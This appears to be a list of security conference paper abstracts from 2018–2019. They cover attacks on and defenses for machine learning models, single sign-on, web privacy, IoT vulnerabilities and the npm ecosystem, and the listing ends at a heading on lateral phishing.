Transfer learning is a powerful approach that allows users to quickly build accurate deep-learning (Student) models by “learning” from centralized (Teacher) models pretrained with large datasets, e.g. Google’s InceptionV3. We hypothesize that the centralization of model training increases their vulnerability to misclassification attacks leveraging knowledge of publicly accessible Teacher models. In this paper, we describe our efforts to understand and experimentally validate such attacks in the context of image recognition. We identify techniques that allow attackers to associate Student models with their Teacher counterparts, and launch highly effective misclassification attacks on black-box Student models. We validate this on widely used Teacher models in the wild. Finally, we propose and evaluate multiple approaches for defense, including a neuron-distance technique that successfully defends against these attacks while also obfuscates the link between Teacher and Student models.

When Does Machine Learning FAIL? Generalized Transferability for Evasion and Poisoning Attacks

Recent results suggest that attacks against supervised machine learning systems are quite effective, while defenses are easily bypassed by new attacks. However, the specifications for machine learning systems currently lack precise adversary definitions, and the existing attacks make diverse, potentially unrealistic assumptions about the strength of the adversary who launches them. We propose the FAIL attacker model, which describes the adversary’s knowledge and control along four dimensions. Our model allows us to consider a wide range of weaker adversaries who have limited control and incomplete knowledge of the features, learning algorithms and training instances utilized. To evaluate the utility of the FAIL model, we consider the problem of conducting targeted poisoning attacks in a realistic setting: the crafted poison samples must have clean labels, must be individually and collectively inconspicuous, and must exhibit a generalized form of transferability, defined by the FAIL model. By taking these constraints into account, we design StingRay, a targeted poisoning attack that is practical against 4 machine learning applications, which use 3 different learning algorithms, and can bypass 2 existing defenses. Conversely, we show that a prior evasion attack is less effective under generalized transferability. Such attack evaluations, under the FAIL adversary model, may also suggest promising directions for future defenses.

Web Authentication

Vetting Single Sign-On SDK Implementations via Symbolic Reasoning

Encouraged by the rapid adoption of Single Sign-On (SSO) technology in web services, mainstream identity providers, such as Facebook and Google, have developed Software Development Kits (SDKs) to facilitate the implementation of SSO for 3rd-party application developers. These SDKs have become a critical foundation for web services. Despite its importance, little effort has been devoted to a systematic testing on the implementations of SSO SDKs, especially in the public domain. In this paper, we design and implement S3KVetter (Single-Sign-on SdK Vetter), an automated, efficient testing tool, to check the logical correctness and identify vulnerabilities of SSO SDKs. To demonstrate the efficacy of S3KVetter, we apply it to test ten popular SSO SDKs which enjoy millions of downloads by application developers. Among these carefully engineered SDKs, S3KVetter has surprisingly discovered 7 classes of logic flaws, 4 of which were previously unknown. These vulnerabilities can lead to severe consequences, ranging from the sniffing of user activities to the hijacking of user accounts.

O Single Sign-Off, Where Art Thou? An Empirical Analysis of Single Sign-On Account Hijacking and Session Management on the Web

Single Sign-On (SSO) allows users to effortlessly navigate the Web and obtain a personalized experience without the hassle of creating and managing accounts across different services. Due to its proliferation, user accounts in identity providers are now keys to the kingdom and pose a massive security risk. In this paper we investigate the security implications of SSO and offer an in-depth analysis of account hijacking in the modern Web. Our experimental methodology explores multiple aspects of the attack workflow and reveals significant variance in how services deploy SSO. We first present a cookie hijacking attack for Facebook that results in complete account takeover, which in turn can be used to compromise accounts in services that support SSO. Next we introduce several novel attacks that leverage SSO for maintaining long-term control of user accounts. We empirically evaluate our attacks against 95 major web and mobile services and demonstrate their severity and stealthy nature. Next we explore what session and account management options are available to users after an account is compromised. Our findings highlight the inherent limitations of prevalent SSO schemes as most services lack the functionality that would allow users to remediate an account takeover. This is exacerbated by the scale of SSO coverage, rendering manual remediation attempts a futile endeavor. To remedy this we propose Single Sign-Off, an extension to OpenID Connect for universally revoking access to all the accounts associated with the hijacked identity provider account.

WPSE: Fortifying Web Protocols via Browser-Side Security Monitoring

We present WPSE, a browser-side security monitor for web protocols designed to ensure compliance with the intended protocol flow, as well as confidentiality and integrity properties of messages. We formally prove that WPSE is expressive enough to protect web applications from a wide range of protocol implementation bugs and web attacks. We discuss concrete examples of attacks which can be prevented by WPSE on OAuth 2.0 and SAML 2.0, including a novel attack on the Google implementation of SAML 2.0 which we discovered by formalizing the protocol specification in WPSE. Moreover, we use WPSE to carry out an extensive experimental evaluation of OAuth 2.0 in the wild. Out of 90 tested websites, we identify security flaws in 55 websites (61.1%), including new critical vulnerabilities introduced by tracking libraries such as Facebook Pixel, all of which fixable by WPSE. Finally, we show that WPSE works flawlessly on 83 websites (92.2%), with the 7 compatibility issues being caused by custom implementations deviating from the OAuth 2.0 specification, one of which introducing a critical vulnerability.

Man-in-the-Machine: Exploiting Ill-Secured Communication Inside the Computer

Operating systems provide various inter-process communication (IPC) mechanisms. Software applications typically use IPC for communication between front-end and back-end components, which run in different processes on the same computer. This paper studies the security of how the IPC mechanisms are used in PC, Mac and Linux software. We describe attacks where a nonprivileged process impersonates the IPC communication endpoints. The attacks are closely related to impersonation and man-in-the-middle attacks on computer networks but take place inside one computer. The vulnerable IPC methods are ones where a server process binds to a name or address and waits for client communication. Our results show that application developers are often unaware of the risks and secure practices in using IPC. We find attacks against several security-critical applications including password managers and hardware tokens, in which another user’s process is able to steal and misuse sensitive data such as the victim’s credentials. The vulnerabilities can be exploited in enterprise environments with centralized access control that gives multiple users remote or local login access to the same host. Computers with guest accounts and shared computers at home are similarly vulnerable.

Neural Networks

Formal Security Analysis of Neural Networks using Symbolic Intervals

Due to the increasing deployment of Deep Neural Networks (DNNs) in real-world security-critical domains including autonomous vehicles and collision avoidance systems, formally checking security properties of DNNs, especially under different attacker capabilities, is becoming crucial. Most existing security testing techniques for DNNs try to find adversarial examples without providing any formal security guarantees about the non-existence of such adversarial examples. Recently, several projects have used different types of Satisfiability Modulo Theory (SMT) solvers to formally check security properties of DNNs. However, all of these approaches are limited by the high overhead caused by the solver.

In this paper, we present a new direction for formally checking security properties of DNNs without using SMT solvers. Instead, we leverage interval arithmetic to compute rigorous bounds on the DNN outputs. Our approach, unlike existing solver-based approaches, is easily parallelizable. We further present symbolic interval analysis along with several other optimizations to minimize overestimations of output bounds.

We design, implement, and evaluate our approach as part of ReluVal, a system for formally checking security properties of Relu-based DNNs. Our extensive empirical results show that ReluVal outperforms Reluplex, a state-of-the-art solver-based system, by 200 times on average. On a single 8-core machine without GPUs, within 4 hours, ReluVal is able to verify a security property that Reluplex deemed inconclusive due to timeout after running for more than 5 days. Our experiments demonstrate that symbolic interval analysis is a promising new direction towards rigorously analyzing different security properties of DNNs.

Turning Your Weakness Into a Strength: Watermarking Deep Neural Networks by Backdooring

Deep Neural Networks have recently gained lots of success after enabling several breakthroughs in notoriously challenging problems. Training these networks is computationally expensive and requires vast amounts of training data. Selling such pre-trained models can, therefore, be a lucrative business model. Unfortunately, once the models are sold they can be easily copied and redistributed. To avoid this, a tracking mechanism to identify models as the intellectual property of a particular vendor is necessary. In this work, we present an approach for watermarking Deep Neural Networks in a black-box way. Our scheme works for general classification tasks and can easily be combined with current learning algorithms. We show experimentally that such a watermark has no noticeable impact on the primary task that the model is designed for and evaluate the robustness of our proposal against a multitude of practical attacks. Moreover, we provide a theoretical analysis, relating our approach to previous work on backdooring.

A4NT: Author Attribute Anonymity by Adversarial Training of Neural Machine Translation

Text-based analysis methods enable an adversary to reveal privacy relevant author attributes such as gender, age and can identify the text’s author. Such methods can compromise the privacy of an anonymous author even when the author tries to remove privacy sensitive content. In this paper, we propose an automatic method, called the Adversarial Author Attribute Anonymity Neural Translation ($\text{A}^{4}\text{NT}$), to combat such text-based adversaries. Unlike prior works on obfuscation, we propose a system that is fully automatic and learns to perform obfuscation entirely from the data. This allows us to easily apply the $\text{A}^{4}\text{NT}$ system to obfuscate different author attributes. We propose a sequence-to-sequence language model, inspired by machine translation, and an adversarial training framework to design a system which learns to transform the input text to obfuscate the author attributes without paired data. We also propose and evaluate techniques to impose constraints on our $\text{A}^{4}\text{NT}$ model to preserve the semantics of the input text. $\text{A}^{4}\text{NT}$ learns to make minimal changes to the input to successfully fool author attribute classifiers, while preserving the meaning of the input text. Our experiments on two datasets and three settings show that the proposed method is effective in fooling the attribute classifiers and thus improves the anonymity of authors.

GAZELLE: A Low Latency Framework for Secure Neural Network Inference

The growing popularity of cloud-based machine learning raises natural questions about the privacy guarantees that can be provided in such settings. Our work tackles this problem in the context of prediction-as-a-service wherein a server has a convolutional neural network (CNN) trained on its private data and wishes to provide classifications on clients’ private images. Our goal is to build efficient protocols whereby the client can acquire the classification result without revealing their input to the server, while guaranteeing the privacy of the server’s neural network.

To this end, we design Gazelle, a scalable and low-latency system for secure neural network inference, using an intricate combination of homomorphic encryption and traditional two-party computation techniques (such as garbled circuits). Gazelle makes three contributions. First, we design the Gazelle homomorphic encryption library which provides fast algorithms for basic homomorphic operations such as SIMD (single instruction multiple data) addition, SIMD multiplication and ciphertext permutation. Second, we implement the Gazelle homomorphic linear algebra kernels which map neural network layers to optimized homomorphic matrix-vector multiplication and convolution routines. Third, we design optimized encryption switching protocols which seamlessly convert between homomorphic and garbled circuit encodings to enable implementation of complete neural network inference.

We evaluate our protocols on benchmark neural networks trained on the MNIST and CIFAR-10 datasets and show that Gazelle outperforms the best existing systems such as MiniONN (ACM CCS 2017) and Chameleon (Crypto Eprint 2017/1164) by 20–30x in online runtime. When compared with fully homomorphic approaches like CryptoNets (ICML 2016), we demonstrate three orders of magnitude faster online run-time.

2019 Technical Sessions dblp

Protecting Users Everywhere

Computer Security and Privacy in the Interactions Between Victim Service Providers and Human Trafficking Survivors

A victim service provider, or VSP, is a crucial partner in a human trafficking survivor’s recovery. VSPs provide or connect survivors to services such as medical care, legal services, employment opportunities, etc. In this work, we study VSP-survivor interactions from a computer security and privacy perspective. Through 17 semi-structured interviews with staff members at VSPs and survivors of trafficking, we surface the role technology plays in VSP-survivor interactions as well as related computer security and privacy concerns and mitigations. Our results highlight various tensions that VSPs must balance, including building trust with their clients (often by giving them as much autonomy as possible) while attempting to guide their use of technology to mitigate risks around revictimization. We conclude with concrete recommendations for computer security and privacy technologists who wish to partner with VSPs to support and empower trafficking survivors.

Clinical Computer Security for Victims of Intimate Partner Violence

Digital insecurity in the face of targeted, persistent attacks increasingly leaves victims in debilitating or even life-threatening situations. We propose an approach to helping victims, what we call clinical computer security, and explore it in the context of intimate partner violence (IPV). IPV is widespread and abusers exploit technology to track, harass, intimidate, and otherwise harm their victims. We report on the iterative design, refinement, and deployment of a consultation service that we created to help IPV victims obtain in-person security help from a trained technologist. To do so we created and tested a range of new technical and non-technical tools that systematize the discovery and investigation of the complicated, multimodal digital attacks seen in IPV. An initial field study with 44 IPV survivors showed how our procedures and tools help victims discover account compromise, exploitable misconfigurations, and potential spyware.

Evaluating the Contextual Integrity of Privacy Regulation: Parents’ IoT Toy Privacy Norms Versus COPPA

Increased concern about data privacy has prompted new and updated data protection regulations worldwide. However, there has been no rigorous way to test whether the practices mandated by these regulations actually align with the privacy norms of affected populations. Here, we demonstrate that surveys based on the theory of contextual integrity provide a quantifiable and scalable method for measuring the conformity of specific regulatory provisions to privacy norms. We apply this method to the U.S. Children’s Online Privacy Protection Act (COPPA), surveying 195 parents and providing the first data that COPPA’s mandates generally align with parents’ privacy expectations for Internet-connected “smart” children’s toys. Nevertheless, variations in the acceptability of data collection across specific smart toys, information types, parent ages, and other conditions emphasize the importance of detailed contextual factors to privacy norms, which may not be adequately captured by COPPA.

Secure Multi-User Content Sharing for Augmented Reality Applications

Augmented reality (AR), which overlays virtual content on top of the user’s perception of the real world, has now begun to enter the consumer market. Besides smartphone platforms, early-stage head-mounted displays such as the Microsoft HoloLens are under active development. Many compelling uses of these technologies are multi-user: e.g., in-person collaborative tools, multiplayer gaming, and telepresence. While prior work on AR security and privacy has studied potential risks from AR applications, new risks will also arise among multiple human users. In this work, we explore the challenges that arise in designing secure and private content sharing for multi-user AR. We analyze representative application case studies and systematize design goals for security and functionality that a multi-user AR platform should support. We design an AR content sharing control module that achieves these goals and build a prototype implementation (ShareAR) for the HoloLens. This work builds foundations for secure and private multi-user AR interactions.

Understanding and Improving Security and Privacy in Multi-User Smart Homes: A Design Exploration and In-Home User Study

Smart homes face unique security, privacy, and usability challenges because they are multi-user, multi-device systems that affect the physical environment of all inhabitants of the home. Current smart home technology is often not well designed for multiple users, sometimes lacking basic access control and other affordances for making the system intelligible and accessible for all users. While prior work has shed light on the problems and needs of smart home users, it is not obvious how to design and build solutions. Such questions have certainly not been answered for challenging adversarial situations (e.g., domestic abuse), but we observe that they have not even been answered for tensions in otherwise functional, non-adversarial households. In this work, we explore user behaviors, needs, and possible solutions to multi-user security and privacy issues in generally non-adversarial smart homes. Based on design principles grounded in prior work, we built a prototype smart home app that includes concrete features such as location-based access controls, supervisory access controls, and activity notifications, and we tested our prototype though a month-long in-home user study with seven households. From the results of the user study, we re-evaluate our initial design principles, we surface user feedback on security and privacy features, and we identify challenges and recommendations for smart home designers and researchers.

Machine Learning Applications

The Secret Sharer: Evaluating and Testing Unintended Memorization in Neural Networks

This paper describes a testing methodology for quantitatively assessing the risk that rare or unique training-data sequences are unintentionally memorized by generative sequence models—a common type of machine-learning model. Because such models are sometimes trained on sensitive data (e.g., the text of users’ private messages), this methodology can benefit privacy by allowing deep-learning practitioners to select means of training that minimize such memorization.

In experiments, we show that unintended memorization is a persistent, hard-to-avoid issue that can have serious consequences. Specifically, for models trained without consideration of memorization, we describe new, efficient procedures that can extract unique, secret sequences, such as credit card numbers. We show that our testing strategy is a practical and easy-to-use first line of defense, e.g., by describing its application to quantitatively limit data exposure in Google’s Smart Compose, a commercial text-completion neural network trained on millions of users’ email messages.

Improving Robustness of ML Classifiers against Realizable Evasion Attacks Using Conserved Features

Machine learning (ML) techniques are increasingly common in security applications, such as malware and intrusion detection. However, ML models are often susceptible to evasion attacks, in which an adversary makes changes to the input (such as malware) in order to avoid being detected. A conventional approach to evaluate ML robustness to such attacks, as well as to design robust ML, is by considering simplified feature-space models of attacks, where the attacker changes ML features directly to effect evasion, while minimizing or constraining the magnitude of this change. We investigate the effectiveness of this approach to designing robust ML in the face of attacks that can be realized in actual malware (realizable attacks). We demonstrate that in the context of structure-based PDF malware detection, such techniques appear to have limited effectiveness, but they are effective with content-based detectors. In either case, we show that augmenting the feature space models with conserved features (those that cannot be unilaterally modified without compromising malicious functionality) significantly improves performance. Finally, we show that feature space models enable generalized robustness when faced with a variety of realizable attacks, as compared to classifiers which are tuned to be robust to a specific realizable attack.

ALOHA: Auxiliary Loss Optimization for Hypothesis Augmentation

Malware detection is a popular application of Machine Learning for Information Security (ML-Sec), in which an ML classifier is trained to predict whether a given file is malware or benignware. Parameters of this classifier are typically optimized such that outputs from the model over a set of input samples most closely match the samples’ true malicious/benign (1/0) target labels. However, there are often a number of other sources of contextual metadata for each malware sample, beyond an aggregate malicious/benign label, including multiple labeling sources and malware type information (e.g. ransomware, trojan, etc.), which we can feed to the classifier as auxiliary prediction targets. In this work, we fit deep neural networks to multiple additional targets derived from metadata in a threat intelligence feed for Portable Executable (PE) malware and benignware, including a multi-source malicious/benign loss, a count loss on multi-source detections, and a semantic malware attribute tag loss. We find that incorporating multiple auxiliary loss terms yields a marked improvement in performance on the main detection task. We also demonstrate that these gains likely stem from a more informed neural network representation and are not due to a regularization artifact of multi-target learning. Our auxiliary loss architecture yields a significant reduction in detection error rate (false negatives) of 42.6% at a false positive rate (FPR) of 10-3 when compared to a similar model with only one target, and a decrease of 53.8% at 10-5 FPR.

Why Do Adversarial Attacks Transfer? Explaining Transferability of Evasion and Poisoning Attacks

Transferability captures the ability of an attack against a machine-learning model to be effective against a different, potentially unknown, model. Empirical evidence for transferability has been shown in previous work, but the underlying reasons why an attack transfers or not are not yet well understood. In this paper, we present a comprehensive analysis aimed to investigate the transferability of both test-time evasion and training-time poisoning attacks. We provide a unifying optimization framework for evasion and poisoning attacks, and a formal definition of transferability of such attacks. We highlight two main factors contributing to attack transferability: the intrinsic adversarial vulnerability of the target model, and the complexity of the surrogate model used to optimize the attack. Based on these insights, we define three metrics that impact an attack’s transferability. Interestingly, our results derived from theoretical analysis hold for both evasion and poisoning attacks, and are confirmed experimentally using a wide range of linear and non-linear classifiers and datasets.

Stack Overflow Considered Helpful! Deep Learning Security Nudges Towards Stronger Cryptography

Stack Overflow is the most popular discussion platform for software developers. Recent research found a large amount of insecure encryption code in production systems that has been inspired by examples given on Stack Overflow. By copying and pasting functional code, developers introduced exploitable software vulnerabilities into security-sensitive high-profile applications installed by millions of users every day. Proposed mitigations of this problem suffer from usability flaws and push developers to continue shopping for code examples on Stack Overflow once again. This points us to fighting the proliferation of insecure code directly at the root before it even reaches the clipboard. By viewing Stack Overflow as a market, implementation of cryptography becomes a decision-making problem: i. e. how to simplify the selection of helpful and secure examples. We focus on supporting software developers in making better decisions by applying nudges, a concept borrowed from behavioral science. This approach is motivated by one of our key findings: for 99.37% of insecure code examples on Stack Overflow, similar alternatives are available that serve the same use case and provide strong cryptography. Our system design is based on several nudges that are controlled by a deep neural network. It learns a representation for cryptographic API usage patterns and classification of their security, achieving average AUC-ROC of 0.992. With a user study we demonstrate that nudge-based security advice significantly helps tackling the most popular and error-prone cryptographic use cases in Android.

Machine Learning, Adversarial and Otherwise

Seeing is Not Believing: Camouflage Attacks on Image Scaling Algorithms

Image scaling algorithms are intended to preserve the visual features before and after scaling, which is commonly used in numerous visual and image processing applications. In this paper, we demonstrate an automated attack against common scaling algorithms, i.e. to automatically generate camouflage images whose visual semantics change dramatically after scaling. To illustrate the threats from such camouflage attacks, we choose several computer vision applications as targeted victims, including multiple image classification applications based on popular deep learning frameworks, as well as main-stream web browsers. Our experimental results show that such attacks can cause different visual results after scaling and thus create evasion or data poisoning effect to these victim applications. We also present an algorithm that can successfully enable attacks against famous cloud-based image services (such as those from Microsoft Azure, Aliyun, Baidu, and Tencent) and cause obvious misclassification effects, even when the details of image processing (such as the exact scaling algorithm and scale dimension parameters) are hidden in the cloud. To defend against such attacks, this paper suggests a few potential countermeasures from attack prevention to detection.

CT-GAN: Malicious Tampering of 3D Medical Imagery using Deep Learning

In 2018, clinics and hospitals were hit with numerous attacks leading to significant data breaches and interruptions in medical services. An attacker with access to medical records can do much more than hold the data for ransom or sell it on the black market. In this paper, we show how an attacker can use deep-learning to add or remove evidence of medical conditions from volumetric (3D) medical scans. An attacker may perform this act in order to stop a political candidate, sabotage research, commit insurance fraud, perform an act of terrorism, or even commit murder. We implement the attack using a 3D conditional GAN and show how the framework (CT-GAN) can be automated. Although the body is complex and 3D medical scans are very large, CT-GAN achieves realistic results which can be executed in milliseconds. To evaluate the attack, we focused on injecting and removing lung cancer from CT scans. We show how three expert radiologists and a state-of-the-art deep learning AI are highly susceptible to the attack. We also explore the attack surface of a modern radiology network and demonstrate one attack vector: we intercepted and manipulated CT scans in an active hospital network with a covert penetration test.

Misleading Authorship Attribution of Source Code using Adversarial Learning

In this paper, we present a novel attack against authorship attribution of source code. We exploit that recent attribution methods rest on machine learning and thus can be deceived by adversarial examples of source code. Our attack performs a series of semantics-preserving code transformations that mislead learning-based attribution but appear plausible to a developer. The attack is guided by Monte-Carlo tree search that enables us to operate in the discrete domain of source code. In an empirical evaluation with source code from 204 programmers, we demonstrate that our attack has a substantial effect on two recent attribution methods, whose accuracy drops from over 88% to 1% under attack. Furthermore, we show that our attack can imitate the coding style of developers with high accuracy and thereby induce false attributions. We conclude that current approaches for authorship attribution are inappropriate for practical application and there is a need for resilient analysis techniques.

Terminal Brain Damage: Exposing the Graceless Degradation in Deep Neural Networks Under Hardware Fault Attacks

Deep neural networks (DNNs) have been shown to tolerate “brain damage”: cumulative changes to the network’s parameters (e.g., pruning, numerical perturbations) typically result in a graceful degradation of classification accuracy. However, the limits of this natural resilience are not well understood in the presence of small adversarial changes to the DNN parameters’ underlying memory representation, such as bit-flips that may be induced by hardware fault attacks. We study the effects of bitwise corruptions on 19 DNN models—six architectures on three image classification tasks—and we show that most models have at least one parameter that, after a specific bit-flip in their bitwise representation, causes an accuracy loss of over 90%. For large models, we employ simple heuristics to identify the parameters likely to be vulnerable and estimate that 40–50% of the parameters in a model might lead to an accuracy drop greater than 10% when individually subjected to such single-bit perturbations. To demonstrate how an adversary could take advantage of this vulnerability, we study the impact of an exemplary hardware fault attack, Rowhammer, on DNNs. Specifically, we show that a Rowhammer-enabled attacker co-located in the same physical machine can inflict significant accuracy drops (up to 99%) even with single bit corruptions and no knowledge of the model. Our results expose the limits of DNNs’ resilience against parameter perturbations induced by real-world fault attacks. We conclude by discussing possible mitigations and future research directions towards fault attack-resilient DNNs.

CSI NN: Reverse Engineering of Neural Network Architectures Through Electromagnetic Side Channel

Machine learning has become mainstream across industries. Numerous examples prove the validity of it for security applications. In this work, we investigate how to reverse engineer a neural network by using side-channel information such as timing and electromagnetic (EM) emanations. To this end, we consider multilayer perceptron and convolutional neural networks as the machine learning architectures of choice and assume a non-invasive and passive attacker capable of measuring those kinds of leakages.

We conduct all experiments on real data and commonly used neural network architectures in order to properly assess the applicability and extendability of those attacks. Practical results are shown on an ARM Cortex-M3 microcontroller, which is a platform often used in pervasive applications using neural networks such as wearables, surveillance cameras, etc. Our experiments show that a side-channel attacker is capable of obtaining the following information: the activation functions used in the architecture, the number of layers and neurons in the layers, the number of output classes, and weights in the neural network. Thus, the attacker can effectively reverse engineer the network using merely side-channel information such as timing or EM.

Intelligence and Vulnerabilities

Reading the Tea leaves: A Comparative Analysis of Threat Intelligence

The term “threat intelligence” has swiftly become a staple buzzword in the computer security industry. The entirely reasonable premise is that, by compiling up-to-date information about known threats (i.e., IP addresses, domain names, file hashes, etc.), recipients of such information may be able to better defend their systems from future attacks. Thus, today a wide array of public and commercial sources distribute threat intelligence data feeds to support this purpose. However, our understanding of this data, its characterization and the extent to which it can meaningfully support its intended uses, is still quite limited. In this paper, we address these gaps by formally defining a set of metrics for characterizing threat intelligence data feeds and using these measures to systematically characterize a broad range of public and commercial sources. Further, we ground our quantitative assessments using external measurements to qualitatively investigate issues of coverage and accuracy. Unfortunately, our measurement results suggest that there are significant limitations and challenges in using existing threat intelligence data for its purported goals.

Towards the Detection of Inconsistencies in Public Security Vulnerability Reports

Public vulnerability databases such as Common Vulnerabilities and Exposures (CVE) and National Vulnerability Database (NVD) have achieved a great success in promoting vulnerability disclosure and mitigation. While these databases have accumulated massive data, there is a growing concern for their information quality and consistency.

In this paper, we propose an automated system VIEM to detect inconsistent information between the fully standardized NVD database and the unstructured CVE descriptions and their referenced vulnerability reports. VIEM allows us, for the first time, to quantify the information consistency at a massive scale, and provides the needed tool for the community to keep the CVE/NVD databases up-to date. VIEM is developed to extract vulnerable software names and vulnerable versions from unstructured text. We introduce customized designs to deep-learning-based named entity recognition (NER) and relation extraction (RE) so that VIEM can recognize previous unseen software names and versions based on sentence structure and contexts. Ground-truth evaluation shows the system is highly accurate (0.941 precision and 0.993 recall). Using VIEM, we examine the information consistency using a large dataset of 78,296 CVE IDs and 70,569 vulnerability reports in the past 20 years. Our result suggests that inconsistent vulnerable software versions are highly prevalent. Only 59.82% of the vulnerability reports/CVE summaries strictly match the standardized NVD entries, and the inconsistency level increases over time. Case studies confirm the erroneous information of NVD that either overclaims or underclaims the vulnerable software versions.

Understanding and Securing Device Vulnerabilities through Automated Bug Report Analysis

Recent years have witnessed the rise of Internet-of-Things (IoT) based cyber attacks. These attacks, as expected, are launched from compromised IoT devices by exploiting security flaws already known. Less clear, however, are the fundamental causes of the pervasiveness of IoT device vulnerabilities and their security implications, particularly in how they affect ongoing cybercrimes. To better understand the problems and seek effective means to suppress the wave of IoT-based attacks, we conduct a comprehensive study based on a large number of real-world attack traces collected from our honeypots, attack tools purchased from the underground, and information collected from high-profile IoT attacks. This study sheds new light on the device vulnerabilities of today’s IoT systems and their security implications: ongoing cyber attacks heavily rely on these known vulnerabilities and the attack code released through their reports. We found that the reliance on known vulnerabilities can actually be used against adversaries. The same bug reports that enable the development of an attack at an exceedingly low cost can also be leveraged to extract vulnerability-specific features that help stop the attack. In particular, we leverage Natural Language Processing (NLP) to automatically collect and analyze more than 7,500 security reports (with 12,286 security critical IoT flaws in total) scattered across bug-reporting blogs, forums, and mailing lists on the Internet. We show that signatures can be automatically generated through an NLP-based report analysis, and used by intrusion detection or firewall systems to effectively mitigate the threats from today’s IoT-based attacks.

ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks

Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them. In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks. In this paper we present ATTACK2VEC, a system that uses word embeddings to model how attack steps are exploited in the wild, and track how they evolve. We test ATTACK2VEC on a dataset of billions of security events collected from the customers of a commercial Intrusion Prevention System over a period of two years, and show that our approach is effective in monitoring the emergence of new attack strategies in the wild and in flagging which attack steps are often used together by attackers (e.g., vulnerabilities that are frequently exploited together). ATTACK2VEC provides a useful tool for research and practitioners to better understand cyberattacks and their evolution, and use this knowledge to improve situational awareness and develop proactive defenses.

Web Attacks

Leaky Images: Targeted Privacy Attacks in the Web

Sharing files with specific users is a popular service provided by various widely used websites, e.g., Facebook, Twitter, Google, and Dropbox. A common way to ensure that a shared file can only be accessed by a specific user is to authenticate the user upon a request for the file. This paper shows a novel way of abusing shared image files for targeted privacy attacks. In our attack, called leaky images, an image shared with a particular user reveals whether the user is visiting a specific website. The basic idea is simple yet effective: an attacker-controlled website requests a privately shared image, which will succeed only for the targeted user whose browser is logged into the website through which the image was shared. In addition to targeted privacy attacks aimed at single users, we discuss variants of the attack that allow an attacker to track a group of users and to link user identities across different sites. Leaky images require neither JavaScript nor CSS, exposing even privacy-aware users, who disable scripts in their browser, to the leak. Studying the most popular websites shows that the privacy leak affects at least eight of the 30 most popular websites that allow sharing of images between users, including the three most popular of all sites. We disclosed the problem to the affected sites, and most of them have been fixing the privacy leak in reaction to our reports. In particular, the two most popular affected sites, Facebook and Twitter, have already fixed the leaky images problem. To avoid leaky images, we discuss potential mitigation techniques that address the problem at the level of the browser and of the image sharing website.

All Your Clicks Belong to Me: Investigating Click Interception on the Web

Click is the prominent way that users interact with web applications. For example, we click hyperlinks to navigate among different pages on the Web, click form submission buttons to send data to websites, and click player controls to tune video playback. Clicks are also critical in online advertising, which fuels the revenue of billions of websites. Because of the critical role of clicks in the Web ecosystem, attackers aim to intercept genuine user clicks to either send malicious commands to another application on behalf of the user or fabricate realistic ad click traffic. However, existing studies mainly consider one type of click interceptions in the cross-origin settings via iframes, i.e., clickjacking. This does not comprehensively represent various types of click interceptions that can be launched by malicious third-party JavaScript code.

In this paper, we therefore systematically investigate the click interception practices on the Web. We developed a browser-based analysis framework, Observer, to collect and analyze click related behaviors. Using Observer, we identified three different techniques to intercept user clicks on the Alexa top 250K websites, and detected 437 third-party scripts that intercepted user clicks on 613 websites, which in total receive around 43 million visits on a daily basis.

We revealed that some websites collude with third-party scripts to hijack user clicks for monetization. In particular, our analysis demonstrated that more than 36% of the 3,251 unique click interception URLs were related to online advertising, which is the primary monetization approach on the Web. Further, we discovered that users can be exposed to malicious contents such as scamware through click interceptions. Our research demonstrated that click interception has become an emerging threat to web users.

What Are You Searching For? A Remote Keylogging Attack on Search Engine Autocomplete

Many search engines have an autocomplete feature that presents a list of suggested queries to the user as they type. Autocomplete induces network traffic from the client upon changes to the query in a web page. We describe a remote keylogging attack on search engine autocomplete. The attack integrates information leaked by three independent sources: the timing of keystrokes manifested in packet inter-arrival times, percent-encoded Space characters in a URL, and the static Huffman code used in HTTP2 header compression. While each source is a relatively weak predictor in its own right, combined, and by leveraging the relatively low entropy of English language, up to 15% of search queries are identified among a list of 50 hypothesis queries generated from a dictionary with over 12k words. The attack succeeds despite network traffic being encrypted. We demonstrate the attack on two popular search engines and discuss some countermeasures to mitigate attack success.

Iframes/Popups Are Dangerous in Mobile WebView: Studying and Mitigating Differential Context Vulnerabilities

In this paper, we present a novel class of Android WebView vulnerabilities (called Differential Context Vulnerabilities or DCVs) associated with web iframe/popup behaviors. To demonstrate the security implications of DCVs, we devise several novel concrete attacks. We show an untrusted web iframe/popup inside WebView becomes dangerous that it can launch these attacks to open holes on existing defense solutions, and obtain risky privileges and abilities, such as breaking web messaging integrity, stealthily accessing sensitive mobile functionalities, and performing phishing attacks.

Then, we study and assess the security impacts of DCVs on real-world apps. For this purpose, we develop a novel technique, DCV-Hunter, that can automatically vet Android apps against DCVs. By applying DCV-Hunter on a large number of most popular apps, we find DCVs are prevalent. Many high-profile apps are verified to be impacted, such as Facebook, Instagram, Facebook Messenger, Google News, Skype, Uber, Yelp, and U.S. Bank. To mitigate DCVs, we design a multi-level solution that enhances the security of WebView. Our evaluation on real-world apps shows the mitigation solution is effective and scalable, with negligible overhead.

Small World with High Risks: A Study of Security Threats in the npm Ecosystem

The popularity of JavaScript has lead to a large ecosystem of third-party packages available via the npm software package registry. The open nature of npm has boosted its growth, providing over 800,000 free and reusable software packages. Unfortunately, this open nature also causes security risks, as evidenced by recent incidents of single packages that broke or attacked software running on millions of computers. This paper studies security risks for users of npm by systematically analyzing dependencies between packages, the maintainers responsible for these packages, and publicly reported security issues. Studying the potential for running vulnerable or malicious code due to third-party dependencies, we find that individual packages could impact large parts of the entire ecosystem. Moreover, a very small number of maintainer accounts could be used to inject malicious code into the majority of all packages, a problem that has been increasing over time. Studying the potential for accidentally using vulnerable code, we find that lack of maintenance causes many packages to depend on vulnerable code, even years after a vulnerability has become public. Our results provide evidence that npm suffers from single points of failure and that unmaintained packages threaten large code bases. We discuss several mitigation techniques, such as trusted maintainers and total first-party security, and analyze their potential effectiveness.

Phishing and Scams

Detecting and Characterizing Lateral Phishing at Scale

